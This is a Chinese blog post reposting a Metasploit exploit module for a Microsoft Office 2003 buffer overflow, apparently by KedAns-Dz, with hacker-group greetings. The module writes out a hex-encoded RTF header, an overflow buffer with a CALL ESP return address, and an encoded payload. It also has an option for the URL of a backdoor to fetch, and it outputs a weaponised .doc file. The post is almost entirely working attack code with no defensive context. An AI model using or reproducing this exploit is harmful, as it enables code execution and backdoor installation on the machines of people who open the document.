n0elle's Blog

Microsoft Office 2003(.doc)命令执行及本地溢出漏洞

    ###
    # Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
    # Author : KedAns-Dz
    # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com
    # Facebook : http://facebook.com/KedAns
    # platform : windows ( local BOF via MSF)
    # Type : local exploit / Buffer Overflow / Metasploit
    ###

    ##
    # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
    # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
    # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
    # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
    # | ------------------------------------------------- < |
    ###

    ##
    # $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
    ##

    require ''msf/core''

    class Metasploit3 < Msf::Exploit::Remote
         Rank = GoodRanking

        include Msf::Exploit::FILEFORMAT

        def initialize(info = {})
            super(update_info(info,
               ''Name''     => ''Microsoft Office 2003 (.doc) Command Exec and local BOF'',
               ''Description'' => %q{
                 This module exploits a buffer overflow in Microsoft Office 2003
                 and Command Exec With .doc file .
    },
               ''License''        => MSF_LICENSE,
               ''Author''         =>
                  [
                   ''b33f'',
                   ''g11tch'',
                   ''KedAns-Dz <ked-h[at]hotmail.com>'' # MSF module
                  ],
               ''Version''        => ''1.0'',
               ''References''     =>
                   [
                [ ''URL'', ''http://exploit-db/exploits/18334'' ],
                   ],
               ''DefaultOptions'' =>
                   {
                    ''EXITFUNC'' => ''process'',
                   },
               ''Payload''        =>
                    {
                    ''Space''      => 1024,
                    ''BadChars''    => "''",
                    ''EncoderType''  => Msf::Encoder::Type::AlphanumMixed,
                    ''EncoderOptions'' =>
                       {
                        ''BufferRegister'' => ''ESI'',
                       }
                    },
               ''Platform''       => ''win'',
               ''Targets''        =>
                   [
                 [ ''Microsoft Office 2003 - MSWord (.doc Heap Spray)'', { ''Ret'' => '''' } ],
                   ],
                ''DisclosureDate'' => ''JAN 08 2012'',
                ''DefaultTarget''  => 0))

            register_options(
               [
                OptString.new(''FILENAME'', [ true, ''The file name.'',  ''msf.doc'']),
                OptString.new(''URLBD'', [ true, ''URL From the Backdoor.'',  ''http://'']),
               ], self.class)
        end

        def exploit
            # Encode the url.
            url = Rex::Text.to_unescape(datastore[''URLBD''])
        # Header File
       file =
       "\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
       "\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
       "\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
       "\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
       "\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
       "\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
       "\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
       "\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
       "\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
       "\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
       "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
       "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
       "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
       "\x66\x66\x66\x66\x66\x66\x66\x66"
     # Buffer Overflow
       buf = "\x23" * 501
           buf << "\x30\x35"
        
    ;   buf << "\x30" * 40
           buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe
           buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
           buf << rand_text_alpha(42)
           buf << "\x39\x30" * 18
           buf << payload.encoded
          # Create the doc
            doc = file
            doc << buf
            doc << url
            doc << "\x00"
            doc << "{}}}}}}"
            doc << "\x0d\x0a"
            doc << "}"

    print_status("Creating ''#{datastore[''FILENAME'']}'' file...")

    file_create(doc)
    end

    end

    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
    # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
    # Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
    # Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
    # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
    # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
    # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
    #=================================================================================================
     

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自n0elle's Blog,原文地址《Microsoft Office 2003(.doc)命令执行及本地溢出漏洞
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~